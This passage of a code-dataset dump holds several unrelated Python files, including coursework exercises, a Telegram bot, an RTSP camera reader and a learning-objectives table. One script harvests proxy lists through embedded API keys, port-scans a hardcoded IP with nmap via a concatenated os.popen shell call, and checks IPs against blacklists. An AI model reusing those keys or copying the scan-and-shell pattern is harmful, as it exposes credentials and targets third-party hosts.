task_2_1()\n    \n    elif argv == '2_2':\n        print('doing task 2_2.')\n        history_2_2 = task_2_2()\n    \n    elif argv == '3':\n        print('doing task 3.')\n        history_3 = task_3() \n    \n    else:\n        print('wrong task number')\n\n\nif __name__ == \"__main__\":\n    #input in the console is the number of the task\n    task = input(\"Enter the number of task to perform: \")\n    main(task)","sub_path":"Lab5/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167534825","text":"'''\nFor KIT103/KMA115 Practical 2: Working with sets\nRevised: 2015-07-14\n\nThis is not a 'real' database, but a script to provide you with some\nworking data (fictitious students spread across fictitious units).\n\nThe 'database' is a dictionary of student IDs mapped to dictionaries,\nwhich map field names (sid, given [name], family [name], and age) to\nthe values for that student.\n\nThe three unit enrolment sets are tik301, ikt130 and kti310. 
Rather\nthan typing these out each time, either create aliases for them, as in\ni = ikt130\nor type the first two letters and press Tab to get Spyder to complete it\nfor you.\n'''\n\nfrom matplotlib_venn import venn3\nfrom pylab import show\nfrom collections import Counter\ndef visualise_overlaps():\n '''Displays a Venn diagram of the number of students in each unit\n and the intersections between them.'''\n venn3([ikt130,kti310,tik301], set_labels=('IKT130', 'KTI310', 'TIK301'))\n show()\n\ndef display_student(student):\n '''Prints one student (dict structure) in fixed width columns.\n\n If you don't mind columns not lining up then it can be done more simply\n than this.\n '''\n print('{0:d} {1:<12} {2:<12} {3:d}'.format(student['sid'], student['family'], student['given'], student['age']))\n\ndef display_subset(sidset):\n '''Very basic printing of the subset of students.'''\n print('ID Family name Given name Age')\n print('---- ------------ ------------ ---')\n for sid in sidset:\n display_student(db[sid])\n\ndef display_all():\n '''Displays all student details.'''\n display_subset( list(db) ) #by default this takes the keys from the dict\n \n\n'''The 'database' of students and enrolments.'''\n\ndb = {\n 2167:{'sid':2167,'given':'Carlo','family':'Aponte','age':19},\n 6331:{'sid':6331,'given':'Missy','family':'Battin','age':19},\n 8860:{'sid':8860,'given':'Rhonda','family':'Billingsley','age':21},\n 3775:{'sid':3775,'given':'Reita','family':'Blaze','age':43},\n 5160:{'sid':5160,'given':'Truman','family':'Cooke','age':25},\n 9853:{'sid':9853,'given':'Reiko','family':'Coon','age':26},\n 4678:{'sid':4678,'given':'Evangelina','family':'Croley','age':24},\n 7419:{'sid':7419,'given':'Myrtice','family':'Cuevas','age':32},\n 6962:{'sid':6962,'given':'Leonie','family':'Dessert','age':23},\n 5031:{'sid':5031,'given':'Ardath','family':'Docherty','age':24},\n 1712:{'sid':1712,'given':'Micah','family':'Dockstader','age':41},\n 9494:{'sid':9494,'given':'Carletta','family':'Dolezal','age':36},\n 8268:{'sid':8268,'given':'Jeff','family':'Garceau','age':22},\n 5735:{'sid':5735,'given':'Ji','family':'Garris','age':20},\n 1866:{'sid':1866,'given':'Williams','family':'Gillie','age':24},\n 1625:{'sid':1625,'given':'Abigail','family':'Grignon','age':19},\n 3542:{'sid':3542,'given':'Raleigh','family':'Guitierrez','age':28},\n 6717:{'sid':6717,'given':'Gene','family':'Hamblin','age':56},\n 8139:{'sid':8139,'given':'Cesar','family':'Hougen','age':30},\n 8084:{'sid':8084,'given':'Michel','family':'Jablonski','age':24},\n 6401:{'sid':6401,'given':'Tandra','family':'Joines','age':19},\n 1760:{'sid':1760,'given':'Karena','family':'Killeen','age':19},\n 9024:{'sid':9024,'given':'German','family':'Klass','age':22},\n 5131:{'sid':5131,'given':'Millard','family':'Kluth','age':20},\n 8254:{'sid':8254,'given':'Nga','family':'Kriebel','age':25},\n 7144:{'sid':7144,'given':'Siobhan','family':'Kuo','age':32},\n 5034:{'sid':5034,'given':'Otha','family':'Lang','age':23},\n 4580:{'sid':4580,'given':'Kelsey','family':'Lares','age':21},\n 6528:{'sid':6528,'given':'Buck','family':'Lenig','age':24},\n 9072:{'sid':9072,'given':'Corey','family':'Liberatore','age':33},\n 2302:{'sid':2302,'given':'Kecia','family':'Lindemann','age':31},\n 1165:{'sid':1165,'given':'Santa','family':'Masden','age':31},\n 6849:{'sid':6849,'given':'Glennis','family':'Mcandrews','age':20},\n 6090:{'sid':6090,'given':'Pandora','family':'Mceachern','age':27},\n 3566:{'sid':3566,'given':'Brigida','family':'Meng','age':31},\n 
2680:{'sid':2680,'given':'Chung','family':'Milstead','age':24},\n 4221:{'sid':4221,'given':'Noelia','family':'Mullet','age':46},\n 9603:{'sid':9603,'given':'Garret','family':'Nakasone','age':21},\n 3769:{'sid':3769,'given':'Garth','family':'Nanez','age':20},\n 8320:{'sid':8320,'given':'Lavada','family':'Neace','age':35},\n 9104:{'sid':9104,'given':'August','family':'Neilsen','age':28},\n 8741:{'sid':8741,'given':'Ward','family':'Ney','age':25},\n 7735:{'sid':7735,'given':'Emil','family':'Oland','age':18},\n 1043:{'sid':1043,'given':'Julio','family':'Overland','age':21},\n 6028:{'sid':6028,'given':'Zaida','family':'Pablo','age':21},\n 5290:{'sid':5290,'given':'Ardella','family':'Pendarvis','age':21},\n 4223:{'sid':4223,'given':'Yun','family':'Perl','age':31},\n 2409:{'sid':2409,'given':'Emile','family':'Reis','age':25},\n 8602:{'sid':8602,'given':'Lucia','family':'Richter','age':19},\n 9077:{'sid':9077,'given':'Mohammed','family':'Sakamoto','age':36},\n 6887:{'sid':6887,'given':'Delora','family':'Sayegh','age':19},\n 9143:{'sid':9143,'given':'Gayle','family':'Schiro','age':35},\n 6650:{'sid':6650,'given':'Fermin','family':'Schutz','age':19},\n 7907:{'sid':7907,'given':'Del','family':'Shellman','age':36},\n 5814:{'sid':5814,'given':'Stacy','family':'Sorrentino','age':20},\n 4013:{'sid':4013,'given':'Gladys','family':'Stringham','age':19},\n 2701:{'sid':2701,'given':'Gilberto','family':'Tidsworth','age':20},\n 1096:{'sid':1096,'given':'Josefa','family':'Tinker','age':24},\n 5160:{'sid':5160,'given':'Ervin','family':'Voight','age':34},\n 2009:{'sid':2009,'given':'Porfirio','family':'Weible','age':39},\n}\n\n# Unit enrolments\n\ntik301 = {1043,1165,1625,1866,2009,2167,2701,3566,5034,5131,6331,6650,6717,6849,8084,9024,9072,9143,9494,9853}\nikt130 = {1165,1625,1760,1866,2302,2680,4223,5031,5034,5131,5814,6650,6887,7907,8084,8320,8860,9024,9143,9494}\nkti310 = {1043,1165,1625,2009,3542,3566,4013,4221,4580,8320}\nt = tik301\ni = ikt130\nk = kti310\n\n\n","sub_path":"student_db.py","file_name":"student_db.py","file_ext":"py","file_size_in_byte":6076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"307998573","text":"# [한방향 연결 리스트 구현하기]\nclass Node: # 노드 정의\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.next = None\n \n def __str__(self):\n return str(self.key)\n \nclass SinglyLinkedList: # 한방향 연결 리스트 정의\n def __init__(self):\n self.head = None\n self.size = 0\n \n def __iter__(self):\n v = self.head\n while v != None:\n yield v\n v = v.next\n \n def __str__(self):\n return \" -> \".join(str(v) for v in self)\n \n def __len__(self):\n return self.size\n \n def printList(self):\n v = self.head\n while v:\n print(v.key, \"->\", end=\" \")\n v = v.next\n print(\"None\")\n \n def pushFront(self, key, value):\n new_node = Node(key, value)\n new_node.next = self.head\n self.head = new_node\n self.size += 1\n \n def pushBack(self, key, value):\n new_node = Node(key, value)\n if self.size == 0: # empty list\n self.head = new_node # new_node가 head가 됨\n else:\n tail = self.head\n while tail.next != None: # tail 노드 찾기\n tail = tail.next\n tail.next = new_node\n self.size += 1\n \n def popFront(self):\n if self.size == 0:\n return None\n else:\n x = self.head\n key = x.key\n self.head = x.next\n self.size = self.size - 1\n del x\n return key\n \n def popBack(self):\n if self.size == 0: # empty list\n return None\n else:\n prev, tail = None, self.head\n while tail.next != None:\n prev = tail\n tail = tail.next\n if 
prev == None: # len(list) == 1\n                self.head = None\n            else: # len(list) > 1\n                prev.next = tail.next\n            key = tail.key\n            del tail\n            self.size -= 1\n            return key\n    \n    def search(self, key):\n        v = self.head\n        while v:\n            if v.key == key:\n                return v\n            v = v.next\n        return None\n    \n    def remove(self, x):\n        if self.size == 0 or x == None:\n            return False\n        elif x == self.head:\n            v = self.head\n            self.head = self.head.next\n            self.size -= 1\n            del v\n            return True\n        else:\n            prev, target = None, self.head\n            while target and target != x:\n                prev = target\n                target = target.next\n            prev.next = target.next\n            self.size -= 1\n            del target\n            return True\n    \n    def size(self):\n        return self.size\n\n# [연산의 시간복잡도]\n# 대상이 되는 노드가 head 노드로부터 k번째 떨어진 노드라고 가정\n# pushFront: 1, pushBack: k\n# popFront: 1, popBack: k\n# search: k, remove: k\n\n# [한방향 연결 리스트와 배열의 장단점은 무엇인가?]\n# 장점: 한 방향 연결 리스트는 데이터를 삽입, 제거하는 경우,\n# 배열과는 다르게 뒷 인덱스인 데이터들의 인덱스를 수정하지 않아도 된다.\n# 단점: pushFront와 popFront를 제외한 나머지 작업에서,\n# 어떤 데이터의 인덱스를 찾거나 참조, 작업을 수행하기 위해서는 해당 데이터의 위치만큼의 시간복잡도가 소요된다.\n\n# [한방향 이중 연결 리스트의 연결을 반대 방향으로 바꾸는 함수 reverse() 구현하기]\n# 1. 연결 리스트를 반대 방향으로 연결한 후, 새로운 head 노드를 리턴\n    def reverse1(self):\n        a, b = None, self.head\n        while b:\n            c = b.next\n            b.next = a\n            a = b\n            b = c\n        self.head = a\n    \n    def reverse2(self, a, b): # 재귀 함수로 구현해보자\n        if b == None:\n            self.head = a\n            return\n        \n        c = b.next\n        b.next = a\n        self.reverse2(b, c)\n\n# Running technique:\n# 한방향 연결 리스트에서 tail 노드와 prev 노드를 찾는 방법에 쓰인 기법으로\n# 두 개의 (포인터) 변수를 사용해 원하는 위치의 노드를 계산하는 방법\n# 1. prev = None, tail = L.head 로 prev가 tail의 한 노드 뒤에서 따라가면서\n#    tail이 실제 tail 노드에 도착하면, prev는 tail 노드 전 노드를 가르킴!\n# 2. [인터뷰 문제1] find_kth_node_from_tail(L, k):\n#    - tail 노드로부터 k번째 전에 있는 노드를 찾아라. (단, 리스트 L의 노드 개수는 모른다고 가정한다.)\n    def find_kth_node_from_tail(self, k):\n        # Runner technique: advance 'fast' k nodes ahead of 'slow'; when\n        # 'fast' runs off the end, 'slow' is the k-th node from the tail\n        # (k == 1 returns the tail node itself).\n        fast = self.head\n        for _ in range(k):\n            if fast == None:\n                return None\n            fast = fast.next\n        slow = self.head\n        while fast != None:\n            slow = slow.next\n            fast = fast.next\n        return slow\n\n# 3. 
[인터뷰 문제2] find_middle_node(L):\n#    - 리스트 L의 노드 개수를 모른다고 가정하고, L의 중간에 위치한 노드를 찾아라!\n#    (L의 노드 개수가 짝수면 중간의 두 노드 중 아무 노드라도 정답)\n    def find_middle_node(self):\n        length = 0\n        v = self.head\n        if v == None:\n            return None\n        \n        while v != None:\n            length += 1\n            v = v.next\n\n        count = 1\n        v = self.head\n        while True:\n            if count == (length//2)+1:\n                return v.key\n            count += 1\n            v = v.next\n        \nL = SinglyLinkedList()\nL.pushBack(1, 1)\nL.pushBack(2, 2)\nL.pushBack(3, 3)\nL.pushBack(4, 4)\nprint(L)\nL.reverse1()\nprint(L)\nL.reverse2(None, L.head)\nprint(L)\nprint(L.find_kth_node_from_tail(2))\nprint(L)\nprint(L.find_middle_node())","sub_path":"자료구조/02_Singly_Linked_List.py","file_name":"02_Singly_Linked_List.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"127674400","text":"import csv\nimport pandas as pd\nimport io\nimport requests\nimport nmap\nimport pydnsbl\nimport urllib\nimport socket\nimport json\nsocket.setdefaulttimeout(180)\nimport os\n\ndef api_hideme():\n    hideme = \"http://incloak.com/api/proxylist.php?out=csv&code=\" + \"730480402242392\"\n    urlData = requests.get(hideme).content\n    df = pd.read_csv(io.StringIO(urlData.decode('utf-8')),delimiter=\";\")\n    return df\n\ndef api_premproxy():\n    z = \"http://filefab.com/api.php?l=90Ft8r4B9ejHAmXjfUKDcoNTZIZrCPGyqv-0E2JAx_Q\"\n    urlData = requests.get(z).content\n    df = pd.read_csv(io.StringIO(urlData.decode('utf-8')), delimiter=\":\")\n    return df\n\ndef dailyproxy():\n    url = \"https://proxy-daily.com/api/getproxylist?apikey=MHAvkX-UOWjz6vbT-t9cpK1&format=ipport&country=US&type=socks5&lastchecked=60\"\n    urlData = requests.get(url).content\n    df = pd.read_csv(io.StringIO(urlData.decode('utf-8')), delimiter=\":\")\n    return df\n\ndef openproxy():\n    url = \"https://api.openproxy.space/premium/plain?amount=34999&apiKey=i9414-d994p4Pa29118LW-yfIl5-eBY64dMT5N16uDv-Vw10n&checksMore=354&countries=US&protocols=3&status=1&streak=1\"\n    urlData = requests.get(url).content\n    df = pd.read_csv(io.StringIO(urlData.decode('utf-8')), delimiter=\":\")\n    return df\n\ndef auth0(ip):\n    try:\n        url = \"https://signals.api.auth0.com/badip/\" + ip\n        headers = {\n            'accept': \"application/json\",\n            'x-auth-token': \"51fac7a1-04c8-4c2f-8143-76c5fa498ff9\"\n        }\n        response = requests.request(\"GET\", url, headers=headers)\n        x = json.loads(response.text)\n        return x['type']\n    except Exception as ex:\n        # Fall back to \"NA\" only when the lookup fails; an unconditional\n        # 'finally: return' would discard every successful result.\n        print('err', ex)\n        return \"NA\"\n\n\ndef isblk(ip):\n    ip_checker = pydnsbl.DNSBLIpChecker()\n    x = str(ip_checker.check(ip))\n    print(x)\n    if 'BLACKLISTED' in x:\n        a = x.rfind('(')\n        b = x.rfind(')')\n        ab = x[a+1:b]\n        ap = auth0(ip)\n        return 'black - ' + ab + ' - ' + str(ap)\n    else:\n        return 'fine'\n\ndef islive(ip,port):\n    qry = 'nmap -p ' + str(port) + ' ' + str(ip)\n    y = os.popen(qry).read()\n    print(y)\n    if 'open' in y:\n        ab = isblk(ip)\n        x = 'live' + '-' + str(ab)\n    else:\n        x = 'dead'\n    return x\n\ndef ipdb_2(ip):\n    url = \"https://freegeoip.app/json/\" + ip\n    headers = {\n        'accept': \"application/json\",\n        'content-type': \"application/json\"\n    }\n    response = requests.request(\"GET\", url, headers=headers)\n    x = json.loads(response.text)\n    y = x['city'] + ' -' + x['country_code']\n    return y\n\n\nislive('173.0.54.188','6888')\n","sub_path":"Z_ALL_FILE/Py/omapi._10112020-1432.py","file_name":"omapi._10112020-1432.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"190124705","text":"#!/usr/bin/python3.7\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/28 10:58\n# @Email : jtyoui@qq.com\n# @Software: PyCharm\n\n\nimport math\nimport re\nfrom jtyoui.regular import Non_Chinese\nfrom jtyoui.decorator import replace_regular\nimport os\n\nALL_WORDS = dict()\nAll_LENS = 0\n\n\ndef read_string(st, split_num, split_seq='[,。!?:.,?]'):\n \"\"\"\n 讲字符按照split_seq格式来分割\n :param st: 字符串\n :param split_num:分词的个数\n :param split_seq: 字符分割\n :return: None\n \"\"\"\n ls = re.split(split_seq, st)\n read_ls(ls, split_num)\n\n\ndef read_ls(ls, split_num):\n \"\"\"数据类型[str]\n :param ls: 表示链表\n :param split_num:分词的个数\n \"\"\"\n global All_LENS\n for word in ls:\n All_LENS += len(word)\n clean_data, lens = clean(data=word)\n if lens > 2:\n split(clean_data, lens, split_num)\n\n\ndef split(words, lens, split_num):\n \"\"\"\n 拆分字符,最大匹配num个字符,并也字典的形式返回,\n [出现次数,出现频率,凝固程度,自由程度,关键字的左邻,关键字的右邻](作为信息熵的衡量)\n \"\"\"\n for i in range(0, lens):\n for j in range(1, split_num + 1):\n if i + j < lens:\n key = words[i:i + j]\n word = ALL_WORDS.get(key)\n if word:\n word[0] += 1\n word[4].append(words[i - 1])\n word[5].append(words[i + j])\n else:\n ALL_WORDS[key] = [1, 0.0, 1, 0, [words[i - 1]], [words[i + j]]]\n\n\ndef statistics(): # 统计每个单词的频率\n for key in ALL_WORDS:\n ALL_WORDS[key][1] = ALL_WORDS[key][0] / All_LENS\n\n\ndef handle():\n \"\"\"\n 处理数据\n 计算左邻字集合和右邻字集合的频率,左邻字信息熵和右邻字信息熵中的较小值\n 计算凝固程度,自由程度\n \"\"\"\n for key in ALL_WORDS:\n word_list = ALL_WORDS[key] # 获得一个单词的链表信息\n if len(key) == 1:\n continue\n end_all = front_all = 0.0\n left = word_list[1] / (ALL_WORDS[key[0]][1] * ALL_WORDS[key[1:]][1]) # 左邻字集合的频率\n right = word_list[1] / (ALL_WORDS[key[-1]][1] * ALL_WORDS[key[:-1]][1]) # 右邻字集合的频率\n\n for front in word_list[4]:\n if ALL_WORDS.get(front):\n front_all -= math.log(ALL_WORDS[front][1]) * ALL_WORDS[front][1] # 左邻字的信息熵\n\n for end in word_list[5]:\n if ALL_WORDS.get(end):\n end_all -= math.log(ALL_WORDS[end][1]) * ALL_WORDS[end][1] # 右邻字的信息熵\n\n # 左邻字集合和右邻字集合的频率相比较.谁越少说明该词语越容易接近谁\n word_list[2] = left if left < right else right\n\n # 左邻字集合的信息熵和右邻字集合的信息熵的相比较.谁的信息熵越少说明该集合提供的信息越大\n word_list[3] = front_all if front_all < end_all else end_all\n\n\ndef filter_words(frequency, cond, free, flag):\n \"\"\"\n 过滤一些不重要的数据\n [出现次数,出现频率,凝固程度,自由程度]\n :param frequency: 过滤的频率\n :param cond:过滤凝聚度\n :param free:过滤自由度\n :param flag: 是否是并且还是或者,默认是或者,满足一个就过滤\n :return:过滤后的数据字典\n \"\"\"\n key_words = dict()\n for key in ALL_WORDS.keys():\n if len(key) <= 1:\n continue\n one_word = ALL_WORDS[key]\n if flag:\n if one_word[1] > frequency and one_word[2] > cond and one_word[3] > free:\n key_words[key] = [one_word[0], one_word[1], one_word[2], one_word[3]]\n else:\n if one_word[1] > frequency or one_word[2] > cond or one_word[3] > free:\n key_words[key] = [one_word[0], one_word[1], one_word[2], one_word[3]]\n return key_words\n\n\n@replace_regular(Non_Chinese, '')\ndef clean(data):\n # 去除非中文字符\n return data, len(data)\n\n\ndef analysis_single(file_str, split_num=4, frequency=0.0001, cond=10, free=0.1, flag=False):\n \"\"\"\n :param file_str: 训练的文本,或者字符串,或者是句子列表\n :param split_num: 匹配个数\n :param frequency: 频率\n :param cond: 凝聚度\n :param free: 自由度\n :param flag:是否是并且还是或者,默认是或者,满足一个就过滤\n :return: 分析完毕的字典\n \"\"\"\n if os.path.exists(file_str):\n with open(file_str, encoding='utf-8') as fp:\n for line in fp:\n read_string(line, split_num)\n elif isinstance(file_str, list):\n read_ls(file_str, split_num)\n else:\n read_string(file_str, split_num)\n\n print(\"开始统计频率.........\")\n statistics()\n\n 
print(\"开始处理数据.........\")\n handle()\n\n print(\"开始过滤数据.........\")\n return filter_words(frequency, cond, free, flag)\n\n\nif __name__ == '__main__':\n neologism_words = analysis_single(r'D:\\data.txt', 6, 0.00001, 100, 0.1, flag=True)\n for k, v in neologism_words.items():\n print('key:{0} count:{1} frequency:{2} cond:{3} free:{4}'.format(k, v[0], v[1], v[2], v[3]))\n","sub_path":"jtyoui/word/Neologism.py","file_name":"Neologism.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"110394589","text":"class CallbackList(list):\n def call_list(self, *args, **kwargs):\n for callback in self:\n assert callable(callback)\n callback(*args, **kwargs)\n\n def __iadd__(self, other):\n from collections import Iterable\n\n if not isinstance(other, Iterable) or isinstance(other, str):\n other = [other]\n\n return super().__iadd__(other)\n","sub_path":"UIBrowser/callbacklist.py","file_name":"callbacklist.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412822917","text":"import cv2\nimport time\nimport multiprocessing as mp\n\n#Camera class to load the rtsp stream into another process with multiprocessing\n#in order to increase performance\nclass camera():\n\n def __init__(self,rtsp_url): \n #load pipe for data transmittion to the process\n self.parent_conn, child_conn = mp.Pipe()\n #load process\n self.p = mp.Process(target=self.update, args=(child_conn,rtsp_url)) \n #start process\n self.p.daemon = True\n self.p.start()\n\n def end(self):\n #send closure request to process\n self.parent_conn.send(2)\n\n def update(self,conn,rtsp_url):\n #load cam into seperate process\n print(\"Camera Loading\")\n cap = cv2.VideoCapture(rtsp_url,cv2.CAP_FFMPEG) \n print(\"Camera Loaded\")\n run = True\n\n while run:\n\n #grab frames from the buffer\n cap.grab()\n\n #recieve input data\n rec_dat = conn.recv()\n\n\n if rec_dat == 1:\n #if frame requested\n _, frame = cap.retrieve()\n conn.send(frame)\n\n elif rec_dat == 2:\n #if close requested\n cap.release()\n run = False\n\n print(\"Camera Connection Closed\") \n conn.close()\n cv2.destroyAllWindows()\n return\n\n def get_frame(self,resize=None):\n ###used to grab frames from the cam connection process\n\n #send request\n self.parent_conn.send(1)\n frame = self.parent_conn.recv()\n\n #reset request \n self.parent_conn.send(0)\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n #resize if needed\n if resize == None: \n return frame\n else:\n return self.rescale_frame(frame)\n\n def rescale_frame(self,frame):\n return cv2.resize(frame,(800, 480), interpolation = cv2.INTER_AREA) \n\n# Based on the code provided by Lewis Morris at \n# https://stackoverflow.com/questions/60816436/open-cv-rtsp-camera-buffer-lag","sub_path":"RaspberryPi/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"457623123","text":"# -*- coding: utf-8 -*-\nimport flask\nimport telebot\nimport conf\nimport random\n\nWEBHOOK_URL_BASE = \"https://{}:{}\".format(conf.WEBHOOK_HOST, conf.WEBHOOK_PORT)\nWEBHOOK_URL_PATH = \"/{}/\".format(conf.TOKEN)\n\nbot = telebot.TeleBot(conf.TOKEN, threaded=False)\n\nbot.remove_webhook()\n\nbot.set_webhook(url=WEBHOOK_URL_BASE+WEBHOOK_URL_PATH)\n\napp = flask.Flask(__name__)\n\n@bot.message_handler(commands=['start', 'help'])\ndef 
send_welcome(message):\n bot.send_message(message.chat.id, \"Раскольников. Родион Романович.\")\n\ndef phrase():\n with open('rask2.txt', 'r', encoding = 'utf-8') as f:\n text = f.readlines()\n return text\n\ntext = phrase()\n\ndef find_name(message):\n answer = message.split(' ')\n all_answers = []\n for all in text:\n for x in answer:\n if x in all:\n all_answers.append(all)\n return random.choice(all_answers)\n\ndef get_answer(message):\n try:\n answer = find_name(message)\n except:\n answer = random.choice(text)\n return answer\n\ndef write_questions(message):\n filename = 'questions.txt'\n with open(filename, 'a', encoding = 'utf-8') as f:\n f.writelines(message.text + '\\n')\n f.writelines(message.from_user.username)\n f.writelines('\\n')\n\n@bot.message_handler(func=lambda m: True) \ndef send_len(message):\n write_questions(message)\n answer = get_answer(message.text)\n bot.send_message(message.chat.id, answer)\n\n\n@app.route('/', methods=['GET', 'HEAD'])\ndef index():\n return 'ok'\n\n@app.route(WEBHOOK_URL_PATH, methods=['POST'])\ndef webhook():\n if flask.request.headers.get('content-type') == 'application/json':\n json_string = flask.request.get_data().decode('utf-8')\n update = telebot.types.Update.de_json(json_string)\n bot.process_new_updates([update])\n return ''\n else:\n flask.abort(403)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297107329","text":"import copy\nimport csv\nimport json\n\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.ensemble import (BaggingClassifier, RandomForestClassifier,\n RandomForestRegressor)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.utils import shuffle\n\n# 读取数据\nwith open('4_新编码数据生成训练集\\\\2_2020年新数据.json', 'r', encoding='utf-8') as f:\n _data = json.loads(f.read())\n\n# rank\nwith open('3_分割数据\\\\新编号.json', 'r', encoding='utf-8') as f:\n rank = json.loads(f.read())\n\n# 所有row的集合\nx = []\ny = []\n\n# 前面存储了出现在540中的关键词的序号\n# 最后一个位置存储公文点击量\na_row_of_info_x = []\na_row_of_info_y = []\n\nlimit = 0\n\nfor row in _data:\n\n # limit += 1\n\n # if limit > 10:\n # break\n\n # data\n #######################################################\n\n # 540个0\n for i in range(540):\n a_row_of_info_x.append(0)\n \n # 有关键词出现的地方补上1\n for keyword in row[0:-1]:\n a_row_of_info_x[keyword - 1] = 1\n\n #######################################################\n\n # target\n #######################################################\n\n # 最后加上点击量,6个等级:\n # x < 200:1\n # 200 <= x < 400:2\n # 400 <= x < 600:3\n # 600 <= x < 800:4\n # 800 <= x < 1000:5\n # x >= 1000:6\n\n click_times :int = row[-1]\n\n # 分类区间间隔\n # INTERVAL = 300\n\n # 几分类?\n # MAX_CLASSIFICATION = 3\n # a_row_of_info_y.append(min(click_times // INTERVAL, MAX_CLASSIFICATION - 1))\n a_row_of_info_y.append(click_times)\n\n #######################################################\n\n x.append(copy.deepcopy(a_row_of_info_x))\n a_row_of_info_x.clear()\n\n y.append(copy.deepcopy(a_row_of_info_y))\n a_row_of_info_y.clear()\n \n# header = rank.keys()\n\n# 把东西直接喂给KNN学习\n\niris_X=np.array(x)\niris_y=np.array(y)\n\nX_train,X_test,y_train,y_test=train_test_split(iris_X,iris_y,test_size=0.20,random_state=None, shuffle=True)\n\n\nforest = RandomForestClassifier(\n n_estimators=100,\n random_state=None,\n max_samples=0.8 #每个样本取这么多数据进行学习\n).fit(X_train, 
y_train.ravel())\n\nprint(forest.predict(X_test))\nprint(y_test)\nprint(\"准确率:\", forest.score(X_test, y_test))\n","sub_path":"5_特征提取_集成学习/539_random_forest_regression.py","file_name":"539_random_forest_regression.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"402063463","text":"from itertools import groupby\nfrom models.lo_models import LearningObjective\nclass LoDB:\n\n def init_data(self):\n\n self.learning_objectives = {\n 'ind01*' : LearningObjective (\n id='ind01*',\n title=\"Computer Department expectations\",\n group='Induction',\n developing=\"Can describe some of the 5B's and 5P's.\",\n satisfactory= \"Can describe all of the 5B's and 5P's.\",\n exceeding= \"Can identify behaviours that exemplify the 5B's and 5P's.\"\n \n ),\n\n 'ind02*' : LearningObjective (\n id='ind01*',\n title=\"Using the VLE\",\n group='Induction',\n developing=\"Can access the VLE to download files and access messages.\",\n satisfactory= \"Can submit homework to the VLE.\",\n exceeding= \"Can describe the Rain Day process.\"\n \n ),\n\n 'ind03*' : LearningObjective (\n id='ind03*',\n title=\"Being a good Netizen\",\n group='Induction',\n developing=\"Can expand and explain the ancronym THINK.\",\n satisfactory= \"Can expand and explain the ancronym FAST.\",\n exceeding= \"Can expand the ancronym THINK.\"\n \n ),\n\n 'oo01*' : LearningObjective (\n id='oo01*',\n title='Find relevant and accurate results from an online search engine',\n group='Operating Online',\n developing='Can produce a set of results from an online search engine.',\n satisfactory= 'Can use advanced criteria in searching for results.',\n exceeding= 'Can assess the quality and veracity of a result'\n \n ),\n\n 'oo02*' : LearningObjective (\n id='oo02*',\n title='Create, edit, save and upload documents in a cloud environment.',\n group='Operating Online',\n developing='Is able to create a document online.',\n satisfactory= 'Is able to upload and edit a file created offline.',\n exceeding= 'Is able to locate a file created online in the synchronised folder.'\n \n ),\n \n 'aict01': LearningObjective(\n id='aict01',\n title='Bring together different types of information to achieve a purpose',\n group=\"Apply ICT\",\n developing='Can combine text information from a variety of sources.',\n satisfactory= 'Can combine graphical information from a variety of sources.',\n exceeding= 'Can multi media information (videos and audio) from a variety of sources.'\n ),\n\n 'aict02': LearningObjective(\n id='aict02',\n title='Produce information that is fit for purpose and audience, using accepted layouts and styles',\n group='Apply ICT',\n developing='Can produce work that partially meets a style guide.',\n satisfactory= 'Can completely follow a style guide.',\n exceeding= 'Can review the work of others and give feedback as to where a style guide is not followed.'\n ),\n 'ss01' : LearningObjective(\n id='ss01',\n title='Using the VLE.',\n group='Software Skills',\n developing='Requires assistance to use.',\n satisfactory= 'Can confidently use.',\n exceeding= 'Can troubleshoot other pupils issues.'\n ),\n 'ss02' : LearningObjective(\n id='ss02',\n title='Using a Word Processor.',\n group='Software Skills',\n developing='Requires assistance to use.',\n satisfactory= 'Can confidently use.',\n exceeding= 'Can troubleshoot other pupils issues.'\n ),\n 'ss03' : LearningObjective(\n id='ss03',\n title='Using a Graphics Package.',\n group='Software Skills',\n 
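# For the random-forest script above: a compact NumPy alternative to the
# 540-zero loop, assuming each row of _data is a list of 1-based keyword ids
# followed by a click count (a sketch, not code from the original repo).
import numpy as np

def encode_rows(data, n_features=540):
    X = np.zeros((len(data), n_features), dtype=np.int8)  # one-hot keyword matrix
    y = np.empty(len(data), dtype=np.int64)               # raw click counts
    for i, row in enumerate(data):
        X[i, np.asarray(row[:-1], dtype=int) - 1] = 1     # shift 1-based ids
        y[i] = row[-1]
    return X, y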
